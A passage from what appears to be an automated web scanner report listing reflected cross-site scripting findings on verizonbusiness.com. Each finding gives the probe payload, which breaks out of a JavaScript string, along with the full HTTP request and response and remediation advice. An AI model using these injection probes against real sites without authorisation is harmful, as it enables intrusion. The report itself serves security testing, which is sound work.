var request='/solutions/bysolutions/managed11dce';a2da5b1f7f3/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.967. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a29'%3b04e633b37b4 was submitted in the REST URL parameter 1. This input was echoed as 50a29';04e633b37b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions50a29'%3b04e633b37b4/bysolutions/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Date: Wed, 17 Nov 2010 00:36:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions50a29';04e633b37b4/bysolutions/networking/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.968. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b954"%3bf9ed557ed46 was submitted in the REST URL parameter 1. This input was echoed as 8b954";f9ed557ed46 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions8b954"%3bf9ed557ed46/bysolutions/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:22 GMT
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions8b954";f9ed557ed46/bysolutions/networking/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.969. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb559'%3bdf7e3ddc66f was submitted in the REST URL parameter 2. This input was echoed as cb559';df7e3ddc66f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionscb559'%3bdf7e3ddc66f/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionscb559';df7e3ddc66f/networking/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.970. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c26"%3bd586c91dfc9 was submitted in the REST URL parameter 2. This input was echoed as 49c26";d586c91dfc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions49c26"%3bd586c91dfc9/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41878
Date: Wed, 17 Nov 2010 00:36:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions49c26";d586c91dfc9/networking/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.971. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbd1d"%3bc1e63abf5fe was submitted in the REST URL parameter 3. This input was echoed as cbd1d";c1e63abf5fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/networkingcbd1d"%3bc1e63abf5fe/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/networkingcbd1d";c1e63abf5fe/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.972. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d60b6'%3bfca45d14847 was submitted in the REST URL parameter 3. This input was echoed as d60b6';fca45d14847 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/networkingd60b6'%3bfca45d14847/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:45 GMT
Content-Type: text/html
Content-Length: 43102
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/networkingd60b6';fca45d14847/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.973. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bf65'%3b727bc9be372 was submitted in the REST URL parameter 1. This input was echoed as 2bf65';727bc9be372 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions2bf65'%3b727bc9be372/bysolutions/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions2bf65';727bc9be372/bysolutions/outsourcing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.974. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23ee1"%3b5a1a301d336 was submitted in the REST URL parameter 1. This input was echoed as 23ee1";5a1a301d336 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions23ee1"%3b5a1a301d336/bysolutions/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions23ee1";5a1a301d336/bysolutions/outsourcing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.975. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ba3"%3b3abf0d35ae was submitted in the REST URL parameter 2. This input was echoed as 60ba3";3abf0d35ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions60ba3"%3b3abf0d35ae/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41876
Date: Wed, 17 Nov 2010 00:35:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions60ba3";3abf0d35ae/outsourcing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.976. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2b11'%3bd20861ee77b was submitted in the REST URL parameter 2. This input was echoed as d2b11';d20861ee77b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsd2b11'%3bd20861ee77b/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:18 GMT
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsd2b11';d20861ee77b/outsourcing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.977. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fda'%3b158a31ed97c was submitted in the REST URL parameter 3. This input was echoed as 40fda';158a31ed97c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/outsourcing40fda'%3b158a31ed97c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:08 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43102
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/outsourcing40fda';158a31ed97c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.978. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f75"%3bd939577d8b5 was submitted in the REST URL parameter 3. This input was echoed as 38f75";d939577d8b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/outsourcing38f75"%3bd939577d8b5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:52 GMT
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/outsourcing38f75";d939577d8b5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.979. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b124f'%3b6025ac978be was submitted in the REST URL parameter 1. This input was echoed as b124f';6025ac978be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsb124f'%3b6025ac978be/bysolutions/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
